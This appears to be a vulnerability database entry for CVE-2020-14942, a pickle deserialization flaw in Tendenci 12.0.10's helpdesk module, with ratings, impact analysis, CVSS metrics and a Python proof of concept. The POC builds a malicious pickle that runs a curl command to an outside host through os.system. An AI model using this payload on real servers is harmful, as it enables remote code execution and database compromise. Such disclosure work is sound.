Attacker Value
Low
(1 user assessed)
Exploitability
High
(1 user assessed)
User Interaction
None
Privileges Required
None
Attack Vector
Network
0

CVE-2020-14942

Disclosure Date: June 21, 2020
Add MITRE ATT&CK tactics and techniques that apply to this CVE.

Description

Tendenci 12.0.10 allows unrestricted deserialization in apps\helpdesk\views\staff.py.

Add Assessment

2
Ratings
Technical Analysis

Outline

Untrusted data from the client side is used to create a python pickled object. This can lead to full RCE and compromise of the host. There are some limitations and this is not the default configuration.

Impact

If you can control the input it may be possible to gain code execution on the underlying server. With code execution you can gain full access to the database and its data.

Limitations

  • The helpdesk module is not enabled by default.
  • A valid authenticated account with permissions to access /tickets

Patch

This doesn’t not appear to be patched in the latest release, although it has been acknowledged

POC

It is fairly easy to create a functional POC against this target if the feature is enabled.

Modify the following POC to fit your needs.

import pickle
import base64
import os


class RCE:
    def __reduce__(self):
        cmd = ('curl 172.22.0.1:1234')
        return os.system, (cmd,)


if __name__ == '__main__':
    pickled = pickle.dumps(RCE())
    print(base64.urlsafe_b64encode(pickled))
CVSS V3 Severity and Metrics
Base Score:
9.8 Critical
Impact Score:
5.9
Exploitability Score:
3.9
Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Attack Vector (AV):
Network
Attack Complexity (AC):
Low
Privileges Required (PR):
None
User Interaction (UI):
None
Scope (S):
Unchanged
Confidentiality (C):
High
Integrity (I):
High
Availability (A):
High

General Information

Vendors

  • tendenci

Products

  • tendenci 12.0.10

Additional Info

Technical Analysis